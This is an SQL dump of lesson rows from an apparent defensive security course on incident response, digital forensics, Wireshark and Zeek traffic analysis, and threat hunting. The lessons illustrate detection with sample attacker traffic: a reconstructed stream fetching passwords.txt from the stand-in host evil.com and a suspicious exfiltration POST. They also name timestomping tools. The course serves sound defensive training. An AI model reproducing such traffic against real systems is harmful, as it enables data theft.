(604, 272, '## The IR Lifecycle (NIST 800-61)\n\nThe Bible of Incident Response is **NIST Special Publication 800-61**. Revision 2 defined the four-phase lifecycle below; Revision 3 (2025) re-frames the same activities around the Cybersecurity Framework 2.0 functions, but the four phases remain the model most SOCs teach and most playbooks are written against.\n\n### 1. Preparation\nThis happens *before* the attack.\n*   **Action**: Establishing the CSIRT, buying tools, writing playbooks, setting up communication channels.\n*   **Key**: If you aren\'t prepared, you have already failed.\n\n### 2. Detection & Analysis\nThis is where the SOC lives.\n*   **Action**: Monitoring the SIEM, triaging alerts, determining if it is a False Positive or a Real Incident.\n*   **Key**: Determining the **Scope**. Is it 1 laptop? Or the entire Domain?\n\n### 3. Containment, Eradication, & Recovery\nThe \"Fix it\" phase.\n*   **Containment**: Stop the spread. (Isolation).\n*   **Eradication**: Remove the threat (Delete malware, disable accounts).\n*   **Recovery**: Restore data from backups, patch vulnerabilities, return to normal.\n\n### 4. Post-Incident Activity (Lessons Learned)\nThe most important, yet most ignored phase.\n*   **Action**: A meeting 2 weeks later. \"What went wrong? Why didn\'t we catch it sooner? How do we improve?\"\n*   **Output**: New SIEM rules, new Playbooks, better tools.\n\n### The Feedback Loop\nIt is a cycle. The \"Lessons Learned\" feed back into \"Preparation\".\n*   \"We got hacked because we didn\'t have MFA.\"\n*   Lesson: Need MFA.\n*   Preparation: Implement MFA.\n*   Result: Next time, that attack fails.\n\n### Alternative Model: SANS PICERL\nSANS breaks it down slightly differently (6 steps):\n1.  **P**reparation\n2.  **I**dentification (Detection)\n3.  **C**ontainment\n4.  **E**radication\n5.  **R**ecovery\n6.  **L**essons Learned', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(605, 273, '## Phase 1: Preparation - The Shield\n\nPreparation is everything. \"Sweat more in training, bleed less in battle.\"\n\n### 1. Policy & Procedure\n*   **Incident Response Policy**: A high-level document signed by the CEO authorizing the CSIRT to act. (e.g., \"CSIRT has the authority to disconnect *any* system, even the CEO\'s laptop, if infected\").\n*   **Playbooks (Runbooks)**: Detailed step-by-step guides for specific scenarios.\n    *   *Phishing Playbook*: 1. Verify sender. 2. Delete email. 3. Check clicks.\n    *   *Ransomware Playbook*: 1. Isolate host. 2. Verify backups. 3. Contact Legal.\n\n### 2. Tools & Resources\nYou cannot install tools *during* the breach. You need them ready.\n*   **Communication**: Out-of-Band methods. If the hackers own your Email server and Slack, how do you talk? (Signal, WhatsApp, Personal emails).\n*   **War Room**: A physical or virtual room where the team gathers.\n*   **Forensic Workstations**: Laptops ready to analyze evidence.\n*   **Jump Kits**: USB drives with static binaries (triage tools) that you can plug into an infected machine.\n\n### 3. The Baseline\nYou cannot know what is \"Abnormal\" if you don\'t know what is \"Normal\".\n*   What ports are usually open?\n*   What is the average CPU usage?\n*   list of authorized Admins.\n*   **Network Diagram**: Essential. You can\'t defend a network if you don\'t know it exists.\n\n### 4. Training\n*   **Tabletop Exercises (TTX)**: Simulation games. The team sits in a room and talks through a scenario.\n    *   Moderator: \"Scenario: The CFO\'s laptop is encrypted and demanding Bitcoin. Go.\"\n    *   Analyst: \"I isolate the host.\"\n    *   Moderator: \"The host is off-site. You can\'t reach it.\"\n    *   Analyst: \"Oh... uh...\"\n    *   *Result*: Gap identified! Need a way to isolate off-site hosts.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(606, 274, '## Phase 2: Detection & Analysis - The Alarm\n\nThis is the phase where the \"Boom\" happens (or where we notice it).\n\n### Vectors of Detection\n*   **Users**: \"My computer is acting weird.\" \"I clicked a link and now I have a popup.\"\n*   **SIEM**: \"Correlation Rule: Malware Beacon detected.\"\n*   **Third Party**: \"FBI calls and says they found your data on the Dark Web.\" (The worst way to find out).\n\n### Triage (The ER Doctor)\nWhen an alert triggers, you must Triage.\n1.  **Validate**: Is it real? (False Positive check).\n2.  **Categorize**:\n    *   *Category*: Malware, Denial of Service, Unauthorized Access, Harassment.\n3.  **Prioritize**:\n    *   *Impact*: High/Med/Low.\n    *   *Urgency*: High/Med/Low.\n    *   *Scenario*:\n        *   Ransomware on CEO laptop -> **Critical**.\n        *   Adware on a Guest WiFi laptop -> **Low**.\n\n### Scoping\nOnce confirmed, you need to determine the **Blast Radius**.\n*   \"We found malware on Host A. Is it also on Host B? C? D?\"\n*   Check SIEM for similar traffic.\n*   Check File Hashes on entire fleet.\n*   **Golden Rule**: Assume you have only discovered 10% of the breach. Keep digging.\n\n### Analysis\n*   Forensics: Disk and Memory analysis.\n*   Malware Analysis: Reverse engineering samples found.\n*   Log Analysis: Tracing the attacker\'s lateral movement.\n\n### Documentation during Analysis\nEvery command you run, every file you touch, you must **Document**.\n*   \"10:05 AM: Reviewed firewall logs.\"\n*   \"10:10 AM: Isolated Host A.\"\n*   \"10:25 AM: Found sample in C:\\\\Temp.\"\nThis is crucial for legal reasons later.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(607, 275, '## Phase 3: Containment - Stop the Bleeding\n\nThe virus is inside. You have identified it. Now stop it from spreading.\n\n### Short-Term Containment\nImmediate action to stop damage.\n*   **Network Isolation**: Unplug the ethernet cable. Disable the switch port. Use EDR \"Network Isolate\" feature.\n*   **Shutdown**: Generally **BAD IDEA** because it destroys RAM (Memory evidence). Only shut down if the drive is actively being encrypted (Ransomware) and you can\'t stop it otherwise.\n*   **Firewall Block**: Block the C2 IP addresses at the perimeter.\n\n### Long-Term Containment\nFixing the temporary patches.\n*   Apply patches to the vulnerability.\n*   Change passwords for compromised accounts.\n*   Strengthen firewall rules.\n\n### Checkmate: The Attacker\'s Response\nBe careful. Attackers monitor your response.\n*   If you block their IP, they might get angry and deploy Ransomware immediately (The \"Scorched Earth\" policy).\n*   Sometimes, you might want to **Watch and Wait** (Sandboxing the attacker) to learn their TTPs before cutting them off. This requires high skill and confidence.\n\n### Evidence Preservation\nDuring containment, you must preserve evidence.\n*   **Chain of Custody**: A log of who held the hard drive, when, and where.\n*   Make forensic images of the disk *before* you wipe anything.\n*   Dump memory (RAM) before rebooting.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(608, 276, '## Phase 4: Eradication & Recovery - Clean Up\n\n### Eradication\nThe threat is contained. Now remove it.\n1.  **Re-imaging**: The old way was \"run Antivirus and hope it cleans it.\" The Modern way is **Nuke and Pave**.\n    *   Wipe the drive.\n    *   Re-install OS from a verified clean \"Golden Image\".\n2.  **Sanitization**:\n    *   Remove malicious emails from users\' inboxes.\n    *   Reset passwords (force global reset if Active Directory was compromised).\n3.  **Improve Defenses**:\n    *   The attacker got in via RDP? Disable RDP.\n    *   They used a vulnerability? Patch it.\n\n### Recovery\nBringing systems back online.\n1.  **Prioritization**: Restore business-critical systems first (ERP, Email) > secondary systems.\n2.  **Validation**: Before reconnecting to the internet, **monitor** the restored system. Is it beaconing again? (Attackers often hide \"persistence\" triggers).\n3.  **Data Restoration**: Restore data from clean backups.\n    *   *Risk*: What if the backup also contains the malware? You must scan backups before restoring.\n\n### The \"Screaming Test\"\nSometimes, you disable a compromised account and wait to see who screams (which service breaks). This helps identify hidden dependencies.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(609, 277, '## Phase 5: Post-Incident Activity - The Debrief\n\nThe dust has settled. The bad guys are gone. Time for the \"Hot Wash\" or \"Post-Mortem\".\n\n### The Report\nYou must produce a final Incident Report.\n*   **Executive Summary**: Non-technical. \"We were hacked. It cost $50k. It\'s over. Here is the risk.\"\n*   **Timeline**: detailed, second-by-second account.\n*   **Technical Findings**: How they got in (Root Cause), what they took.\n*   **Recommendations**: The \"To-Do\" list to fix the holes.\n\n### The Root Cause Analysis (RCA)\nUse the \"5 Whys\" technique.\n*   **Problem**: Server was hacked.\n    *   *Why?* Vulnerability in Apache was exploited.\n    *   *Why?* It wasn\'t patched.\n    *   *Why?* The patching script failed.\n    *   *Why?* The server disk was full, so the update failed.\n    *   *Why?* No one monitors disk space on Dev servers.\n*   **Root Cause**: Lack of monitoring on Dev servers.\n*   **Fix**: Implement monitoring on all servers.\n\n### Updating the Organization\n*   **Metrics**: Time to Detect (TTD), Time to Respond (TTR). Did we improve?\n*   **Playbook Updates**: \"Our Ransomware playbook didn\'t say who to call at the ISP. We wasted 1 hour finding the number. Update the playbook.\"\n*   **Evidence Retention**: How long do we keep the forensic images? (Usually years, for legal reasons).\n\n### Closing\nThe goal of this phase is not to blame (Finger Pointing), but to improve (System Strengthening). If you skip this, you WILL be hacked again by the same technique.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
(610, 278, '## Module 27 Review\nYou have learned the NIST IR Cycle:\n1.  **Prep**: Be ready.\n2.  **Detect**: Find it.\n3.  **Contain**: Stop it. (Isolate).\n4.  **Eradicate/Recover**: Fix it.\n5.  **Post-Incident**: Learn from it.\n\nNext: Digital Forensics (The science of evidence preservation).', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 14:19:16'),
(611, 281, '## What is Digital Forensics?\n\n**Digital Forensics** is the science of identifying, preserving, recovering, analyzing, and presenting facts about digital evidence. It is CSI for computers.\n\n### The Goal\nThe goal is not just \"Find the bad guy\". It is to answer the W-questions:\n*   **Who** did it? (Attribution).\n*   **What** did they do? (Actions).\n*   **When** did it happen? (Timeline).\n*   **How** did they get in? (Root Cause).\n\n### Forensic Soundness (Admissibility)\nIn a court of law, evidence must be **admissible**.\n*   If you boot up the suspect\'s laptop to look around, you have modified the evidence (timestamps changed, temporary files created). A defense lawyer will argue: \"The analyst tampered with the device. The malware could have been planted by the analyst.\"\n*   **Rule #1**: Never work on the original evidence. Always work on a forensic copy (Image).\n*   **Rule #2**: Verify integrity using Hashes.\n\n### Types of Forensics\n1.  **Disk Forensics**: Analyzing hard drives, USBs. (Finding deleted files).\n2.  **Memory Forensics**: Analyzing RAM. (Finding running malware, encryption keys, chat logs).\n3.  **Network Forensics**: Analyzing PCAPs and logs.\n4.  **Mobile Forensics**: iOS/Android analysis.\n\n### Locard\'s Exchange Principle\n\"Every contact leaves a trace.\"\nIn the physical world, a burglar leaves fingerprints and takes mud on their shoes.\nIn the digital world, a hacker leaves logs, registry keys, and cache files, and takes data. It is impossible to interact with a system without changing it.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(612, 282, '## Live vs. Dead Forensics & Order of Volatility\n\nWhen you approach a compromised machine, you have a choice: pull the plug or analyze it live?\n\n### Order of Volatility (RFC 3227)\nData disappears at different rates when power is lost. You must capture the most volatile data *first*.\n\n1.  **CPU Registers, Cache** (Nanoseconds). *Practically impossible to capture in the field.*\n2.  **System Memory (RAM)** (Seconds). *Contains keys, passwords, unsaved documents, running processes.*\n3.  **Network State** (Seconds). *Active connections to the hacker.*\n4.  **Running Processes** (Seconds).\n5.  **Disk (HDD/SSD)** (Years). *Files, Logs.*\n6.  **Remote Logs / Backups** (Years).\n7.  **Physical Configuration** (Forever).\n\n**Golden Rule**: If you pull the plug, **RAM is gone forever**. If the disk was encrypted (BitLocker) and the key was in RAM, you have locked yourself out permanently (unless a recovery key was escrowed in Active Directory/Entra ID or your MDM, so check that *before* you power anything off).\n\n### Dead Forensics (Post-Mortem)\n*   System is powered off.\n*   Hard drive is removed.\n*   Imaged using a Write Blocker.\n*   Analyzed in a lab.\n*   *Pros*: Safe, no risk of altering data.\n*   *Cons*: No RAM, no network state. Rootkits are inactive (harder to see).\n\n### Live Forensics\n*   System is running.\n*   You insert a USB with trusted tools (DumpIt, FTK Imager Lite).\n*   You dump RAM and run triage scripts.\n*   *Pros*: Captures encryption keys, active connections.\n*   *Cons*: **You alter the system**. Inserting a USB changes the registry. Running a tool consumes RAM. You must document *exactly* what you did to explain the changes in court.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(613, 283, '## Evidence Handling & Chain of Custody\n\nIf you cannot prove who held the evidence, the evidence is worthless.\n\n### Chain of Custody (CoC)\nA legal document that tracks the life of a piece of evidence.\n*   **Fields**:\n    *   Item Description: \"Seagate 1TB HDD, Serial #XYZ\".\n    *   Date/Time: \"2023-10-27 14:00\".\n    *   Released By: \"John Doe (Analyst)\".\n    *   Received By: \"Jane Smith (Evidence Locker Manager)\".\n    *   Reason: \"Overnight Storage\".\n*   **Gap in Chain**: If the drive was logged out on Friday and logged back in on Monday, but nobody signed for it over the weekend, the Defense will say: \"Someone replaced the drive.\" Case dismissed.\n\n### Evidence Integrity (Hashing)\nHow do we prove the file hasn\'t changed in 5 years? **Hashing**.\n*   **MD5 / SHA1**: Old and collision-broken (an attacker can craft two different files with the same hash), so never rely on them alone. Many imaging tools still record them alongside SHA256 for compatibility with older reports; that is fine as long as SHA256 is there too.\n*   **SHA256**: The standard.\n*   **Procedure**:\n    1.  Acquire the drive image.\n    2.  Calculate SHA256 immediately. (e.g., `A1B2...`).\n    3.  Record `A1B2...` in the CoC.\n    4.  Six months later in court, hash the drive again.\n    5.  It MUST match `A1B2...` exactly. If one bit changed, the hash changes completely.\n\n### The Evidence Locker\n*   Physical security.\n*   Restricted access (Badge in/out).\n*   Faraday Bags: Bags lined with metal mesh to block radio signals. Use these for Mobile Phones (so they don\'t receive a \"Remote Wipe\" command from iCloud/Google or the company MDM).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(614, 284, '## Disk Imaging & Acquisition\n\nCopying a file (`Ctrl+C, Ctrl+V`) is NOT forensic acquisition. Copying only copies the *active* data. It ignores \"Slack Space\" and \"Deleted Files\".\n\n### Forensic Image\nA bit-by-bit clone of the drive. It copies every 0 and 1, including the empty space (where deleted files live).\n*   **Formats**:\n    *   **.dd (Raw)**: Pure dump.\n    *   **.E01 (EnCase)**: The industry standard. Includes compression, password protection, and metadata (Case number, Investigator Name) inside the file header.\n\n### Write Blockers\nA hardware device that sits between the suspect drive and your computer.\n*   **Function**: It physically cuts the \"Write\" wire. Data can flow *from* the suspect drive, but NOTHING can flow *to* it.\n*   **Mandatory**: If you attach a Windows drive to your PC without a blocker, Windows will automatically mount it, may update timestamps, and will create its own `$RECYCLE.BIN` and `System Volume Information` folders on it, altering the evidence instantly.\n\n### Tools\n*   **FTK Imager**: Free, standard. can capture RAM and Disk.\n*   **Guymager (Linux)**: fast open source imager.\n*   **dd**: The classic Linux command. `dd if=/dev/sda of=/evidence/image.dd conv=noerror,sync` (without `conv=noerror,sync` a single bad sector aborts the copy; `dd` also does not hash for you, so run `sha256sum` on both sides yourself, or use a forensic variant such as `dc3dd`/`dcfldd` that hashes as it copies).\n\n### Verification\nAfter imaging, the Imager will automatically hash the Source (Physical Drive) and the Destination (Image File). They must match.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(615, 285, '## File System Analysis: NTFS & Timestamps\n\nThe file system acts as the librarian of the drive.\n\n### NTFS (New Technology File System)\nThe standard Windows file system.\n*   **$MFT (Master File Table)**: The heart of NTFS. It is a hidden file that contains a record for *every* file on the drive.\n    *   It stores: File Name, Size, Permissions, Timestamps, and **Physical Location** on disk.\n*   **Resident Files**: If a file is very small (roughly < 700 bytes with the default 1 KB MFT record), NTFS stores the content *directly inside the MFT record* to save space.\n*   **Deleted Files**:\n    *   When you delete a file, Windows does NOT erase the data.\n    *   It simply marks the MFT entry as \"Free\".\n    *   The data stays on the disk until a new file overwrites it. This is why forensics can recover deleted files. (On SSDs, TRIM may zero the blocks much sooner, so recovery is far less reliable.)\n\n### Timestamps (MACB Times)\nEvery NTFS file has 4 timestamps, usually abbreviated **MACB**.\n*   **M**odified: Content changed. (e.g., \"Save\" in Word).\n*   **A**ccessed: File read/opened. (Looking at a picture). **Caveat**: Windows has disabled Last Access updates by default since Vista (`NtfsDisableLastAccessUpdate`), so this value is often stale and should not be relied on.\n*   **C**hanged (Entry Modified): The MFT record itself changed (rename, permission or attribute change).\n*   **B**orn (Created): File created on *this* volume. A *copy* to another volume gets a fresh Created time; a *move* within the same volume keeps the original.\n\n### Time Stomping\nAttackers can use tools (like `touch`, Metasploit\'s `timestomp`, or `SetMACE`) to modify timestamps to hide their tracks.\n*   *Detection*: NTFS keeps two sets of timestamps per file: $STANDARD_INFORMATION (which user-mode tools can set) and $FILE_NAME (which they normally cannot). Tells include all-zero sub-second digits, or a $STANDARD_INFORMATION Created time that is *earlier* than the $FILE_NAME Created time. Treat a mismatch as an indicator, not proof: renames and moves also rewrite $FILE_NAME, so corroborate with the USN journal, $LogFile or Prefetch.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(616, 286, '## Windows Artifacts: Where the Secrets Hide\n\nWindows is a messy roommate. It keeps records of *everything* you do to improve \"User Experience\". Forensics exploits this.\n\n### 1. Prefetch\n*   **Location**: `C:\\Windows\\Prefetch`\n*   **Purpose**: Speed up app loading.\n*   **Artifact**: Shows **Name of Executable** run, **First/Last Run Time** (the last 8 run times on Windows 8+), and **Run Count**.\n*   **Use**: \"Did the suspect run CCleaner? Yes, 5 times. Last time was 10 minutes before we arrived.\"\n*   **Caveat**: Prefetch is disabled by default on Windows Server editions and can be turned off by policy, so an empty folder proves nothing.\n\n### 2. ShimCache (AppCompatCache)\n*   **Location**: Registry (SYSTEM hive).\n*   **Purpose**: Compatibility settings for old apps.\n*   **Artifact**: Tracks executables present on the system, even if they were deleted.\n*   **Use**: Proving that `malware.exe` existed on the system in the past.\n*   **Caveat**: On Windows 10+ an entry proves the file was *present*, not that it *ran*, and the cache is only flushed to the registry at shutdown/reboot, so it can lag behind.\n\n### 3. Jump Lists & LNK Files\n*   **Location**: User Profile (`%AppData%\\Microsoft\\Windows\\Recent` for LNK files, `...\\Recent\\AutomaticDestinations` for Jump Lists).\n*   **Purpose**: \"Recent Files\" in Taskbar/Start Menu.\n*   **Artifact**: Shows files accessed by the user, including the original path, volume serial and MAC times of the target.\n*   **Use**: \"The user opened `stolen_plans.pdf` from a USB drive `E:`.\"\n\n### 4. Registry Hives\n*   **SAM**: User accounts, password hashes (NT hashes; the SYSTEM hive\'s boot key is needed to decrypt them).\n*   **SYSTEM**: System config, Timezone, USB history (**USBStor** - proves a specific USB serial number was plugged in).\n*   **SOFTWARE**: Installed programs, Versions.\n*   **NTUSER.DAT**: Per-user settings. \"Recent Docs\", Search History, TypedPaths/TypedURLs in Explorer and IE.\n\n### 5. Amcache.hve\n*   **Use**: Stores SHA1 hashes (of the first ~31 MB) of executables seen on the system, with a timestamp.\n*   **Golden**: You can map a file hash to a timestamp and pivot it to threat intel. Like ShimCache, presence in Amcache alone is not proof of execution; corroborate with Prefetch or event logs.\n\n### 6. Shellbags\n*   **Location**: Registry (USRCLASS.DAT and NTUSER.DAT).\n*   **Use**: Tracks which **Folders/Directories** the user browsed in Explorer.\n*   **Power**: It persists even if the folder is deleted. You can construct a map of the user\'s file system knowledge.', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 15:09:09'),
(617, 287, '## Module 28 Review\nYou have scratched the surface of Digital Forensics:\n1.  **CoC + Hashing**: Prove who held the evidence and that it did not change.\n2.  **Imaging**: Use a Write Blocker and verify source/image hashes.\n3.  **Artifacts**: Windows creates trails (Prefetch, Registry, LNK) for everything you do.\n\nNext: Network Traffic Analysis (Packet Inspection).', 'markdown', 15, '2025-12-26 23:05:09', '2025-12-29 14:19:16'),
(618, 291, '## Why Analyze Network Traffic?\n\nNetwork Traffic Analysis (NTA) is looking at the wire. \"The Packet Never Lies.\" Logs can be deleted; Endpoints can be rootkitted to hide processes; but if data was sent, the packets existed. (A packet proves *that* something was sent; attackers encrypt and tunnel, so it does not always reveal *what*.)\n\n### The Scope\n*   **North/South**: Traffic entering/leaving your network (Internet). Found at the Firewall/Gateway.\n*   **East/West**: Traffic moving between internal servers. Found at Core Switches (Internal Taps). Often the blind spot: most organizations only capture North/South.\n\n### The Challenge: Encryption\nThe large majority of web traffic is HTTPS (TLS encrypted).\n*   **Problem**: We can\'t see the payload. We don\'t know if the user downloaded a cat picture or malware.\n*   **Solution 1**: **TLS Inspection (\"SSL Decryption\")**. A proxy intercepts traffic, decrypts it, inspects it, re-encrypts it. Expensive, breaks certificate pinning, and raises privacy/legal issues (Banking/Healthcare).\n*   **Solution 2**: **Traffic Metadata Analysis**. (JA3).\n    *   Even encrypted info has fingerprints.\n    *   The \"Client Hello\" packet in TLS sends specific cipher suites and extensions, in the clear, even in TLS 1.3.\n    *   A standard Chrome Browser sends one set.\n    *   A Metasploit or Cobalt Strike implant sends a different set.\n    *   JA3 creates a hash of this handshake to identify the *application* even if the *content* is encrypted.\n    *   **Caveat**: JA3 is easy to spoof (implants mimic browser fingerprints, and some libraries randomize the handshake), so use it as a lead, not proof; JA4 is the newer, more resilient successor. Encrypted Client Hello (ECH), where deployed, also hides the SNI.\n\n### Use Cases\n*   Detecting C2 Beaconing.\n*   Finding Data Exfiltration (Large uploads).\n*   Spotting scanning activity.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(619, 292, '## Packet Capture (PCAP) Fundamentals\n\nA PCAP file contains the raw data captured from the network card.\n\n### The TCP 3-Way Handshake\nTo understand traffic, you must understand TCP.\n1.  **SYN**: \"Hi, I want to connect.\" (Client -> Server)\n2.  **SYN-ACK**: \"Okay, I see you. I\'m ready.\" (Server -> Client)\n3.  **ACK**: \"Great, let\'s go.\" (Client -> Server)\n\n**Analyst Check**:\n*   If you see lots of SYNs but no SYN-ACKs? -> **SYN Flood (DoS)** or **Port Scan** (host is down).\n*   If you see SYN, SYN-ACK, RST? -> Connection rejected.\n\n### TCP Flags (The Signal Flags)\n*   **SYN**: Synchronize. Start.\n*   **ACK**: Acknowledge. Confirm.\n*   **FIN**: Finish. Graceful exit. (\"I\'m done, goodbye\").\n*   **RST**: Reset. Abort. (\"Get lost\" or \"I crashed\").\n*   **PSH**: Push. Send data now.\n\n### Protocol Hierarchy\n1.  **Ethernet**: MAC Addresses. (Local Network).\n2.  **IP**: IP Addresses. (Internet).\n3.  **TCP/UDP**: Ports. (Application Service).\n4.  **Application**: HTTP, DNS, SMB. (The Data).\n\nWhen analyzing, work up the stack. First check IP (Who?), then Port (What Service?), then App (What Content?).', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(620, 293, '## Wireshark Essentials\n\nWireshark is the microscope for packets.\n\n### 1. Capture Filters vs. Display Filters\n*   **Capture Filters (BPF)**: Set *before* you record. Discards packets.\n    *   `host 192.168.1.1` -> Only save packets involving this IP.\n    *   **Pro**: saves disk space. **Con**: If you didn\'t capture it, you can\'t see it later.\n*   **Display Filters**: Set *after* recording. Just hides packets from view.\n    *   `ip.addr == 192.168.1.1`\n    *   **Pro**: Flexible. Non-destructive.\n\n### 2. Essential Display Filters\n*   `http.request.method == \"POST\"`: Show me data uploads.\n*   `tls.handshake.type == 1`: Show me HTTPS Client Hellos; the `tls.handshake.extensions_server_name` field (SNI) carries the domain name.\n*   `dns.flags.response == 0`: Show me DNS queries.\n*   `tcp.flags.syn == 1 and tcp.flags.ack == 0`: Show me connection attempts.\n\n### 3. Follow TCP Stream\nRight-click a packet -> \"Follow TCP Stream\".\n*   Wireshark reassembles the conversation.\n*   Instead of seeing 50 packets, you see the reconstructed text:\n    *   `GET /passwords.txt HTTP/1.1`\n    *   `Host: evil.com`\n    *   `...`\n\n### 4. Export Objects\nFile -> Export Objects -> HTTP.\n*   Wireshark can extract files downloaded in the traffic.\n*   \"Oh, the user downloaded `virus.exe`? I can carve that file out of the PCAP, hash it, and look the hash up.\"\n*   **Safety**: what you carve is live malware. Do it on an isolated analysis VM, never on your daily workstation, never double-click the file, and store it zipped with a password so AV and sync tools do not act on it.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(621, 294, '## Analyzing HTTP Traffic\n\nHTTP is the language of the web (and most malware).\n\n### The Request\n*   **Method**:\n    *   GET: Retrieve data.\n    *   POST: Send data (Logins, Uploads). **Focus on POSTs**.\n*   **User-Agent**: Who is asking?\n    *   `Mozilla/5.0... Chrome/90...`: Normal Browser.\n    *   `Python-urllib/3.0`: Python Script. (Suspicious on a user laptop).\n    *   `Struts-Shock`: Exploit tool.\n    *   **Caveat**: the User-Agent is a free-text header chosen by the client. Attackers forge it, and mature malware copies a real browser\'s string, so an odd UA is a lead and a normal UA proves nothing.\n*   **Host**: The domain.\n*   **Referer**: Where did you come from? (Did you click a link on Google, or a link on a Phishing site?) Also client-controlled.\n\n### The Response\n*   **Status Codes**:\n    *   `200 OK`: Success.\n    *   `301/302`: Redirect.\n    *   `401/403`: Unauthorized. (Brute Force?)\n    *   `404`: Not Found. (Scanning?)\n    *   `500`: Server Error. (Exploit crashed the server?)\n\n### Analysis Scenario\n1.  **Alert**: \"Suspicious User-Agent\".\n2.  **Packet**: `POST /upload.php` from IP 10.10.10.5. User-Agent: `DarkSides/1.0`.\n3.  **Stream**: The content of the POST is a large blob of encrypted data.\n4.  **Verdict**: Likely C2 / exfiltration. Confirm on the endpoint (which process owns the socket, is it signed, how was it started?) before declaring an incident.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(622, 295, '## Detecting Malicious Traffic\n\nWhat does \"Bad\" look like on the wire?\n\n### 1. Beaconing (Heartbeats)\n*   **Regularity**: Every 60 seconds (Delta Time).\n*   **Small Size**: Packets are identical in size.\n*   **Jitter**: Sophisticated beacons add randomization (60s, 62s, 58s).\n\n### 2. Data Exfiltration\n*   **Large Outbound**: Internal IP sending GBs to External IP.\n*   **Protocol Misuse**:\n    *   **DNS Tunneling**: Huge volume of DNS queries to the same domain.\n    *   **ICMP Tunneling**: Ping packets containing data payloads instead of \"abcdefg\".\n*   **Steganography**: Hiding data inside images. (Hard to detect on wire without payload analysis).\n\n### 3. Scanning\n*   **Port Scan**: One IP sending SYNs to 1000 ports on one target.\n*   **Net Scan**: One IP sending SYNs to Port 445 on 1000 targets.\n\n### 4. Cleartext Credential Leaks\n*   **FTP / Telnet / HTTP (Basic Auth)**: Passwords sent in clear text.\n*   **Analyst**: \"Follow Stream\". Search for \"Password\" or \"Pass\".', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 15:09:09'),
(623, 296, '## Zeek (formerly Bro)\n\nWireshark is great for 1 packet. Zeek is great for 1 million packets.\n\n### What is Zeek?\nIt acts like a NIDS, but instead of \"Alerting\", it generates **Transaction Logs**.\nIt summarizes traffic into readable Tab-Separated Values (TSV) logs (JSON output is a config switch, which is what most SIEM pipelines use).\n\n### Key Logs\n*   **conn.log**: All TCP/UDP connections. (Source, Dest, Duration, Bytes).\n*   **http.log**: All HTTP requests (URI, User-Agent, Referer).\n*   **dns.log**: All DNS queries.\n*   **ssl.log**: TLS handshakes (SNI, version, JA3/JA3S, certificate chain reference); the certificates themselves land in **x509.log**.\n\n### Why use it?\nNTA with Zeek is faster.\n*   **Question**: \"Did anyone visit `evil.com`?\"\n*   *Wireshark*: Open 50GB pcap, wait 10 minutes to load, filter `dns.qry.name contains \"evil\"`.\n*   *Zeek*: `grep \"evil.com\" dns.log`. (Instant).\n\nZeek logs are metadata only; it does not keep payloads. Keep a rolling PCAP (or enable Zeek\'s file extraction) if you will ever need to pull the actual file.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(624, 297, '## Module 29 Review\nNTA gives you the ground truth.\n*   **Wireshark** for deep inspection of a single stream.\n*   **Zeek** for high-level logging of all traffic.\n*   **HTTPS** hides content, but metadata (JA3, certificates, size) still reveals a lot.\n\nNext: Proactive defense with Threat Hunting.', 'markdown', 15, '2025-12-26 23:06:44', '2025-12-29 14:20:29'),
(625, 301, '## What is Threat Hunting?\n\n**Threat Hunting** is the proactive search for cyber threats that are lurking undetected in a network.\n\n### The Problem with Passive Defense\nTraditional security (SIEM, EDR, IDS) is **Reactive**.\n*   It waits for an alarm to go off.\n*   \"If Signature X matches, Send Alert.\"\n*   **The Flaw**: Sophisticated attackers (APTs) use custom tools and \"Living off the Land\" techniques (PowerShell, WMI) that do NOT trigger signatures. They can dwell in a network for **months**. (Older industry reports put median dwell time near 200 days; recent M-Trends reports show it has fallen to a couple of weeks, partly because ransomware announces itself, but long-dwell espionage intrusions still occur.)\n\n### The Hunter\'s Mindset\nThreat Hunting is **Proactive**.\n*   **Analogy**:\n    *   **Reactive**: Waiting for your burglar alarm to ring.\n    *   **Proactive**: Walking around your house with a baseball bat, checking under the beds, even though the alarm didn\'t ring.\n*   **Assumption**: \"We are already compromised. I just haven\'t found it yet.\"\n\n### Who hunts?\n*   It requires a human analyst. AI cannot hunt (yet) because hunting requires **Creativity** and **Intuition**.\n*   \"That admin logged in at 2 AM. It\'s not an alert because he *is* an admin. But I know he\'s on vacation in Hawaii. That\'s suspicious.\"\n\n### The Three Pillars of Hunting\n1.  **Triggers**: What starts a hunt? (Intel, Hypothesis).\n2.  **Data**: You can\'t hunt what you can\'t see. (Logs).\n3.  **Tools**: SIEM, EDR, Jupyter Notebooks.', 'markdown', 15, '2025-12-26 23:08:10', '2025-12-29 15:11:15'),
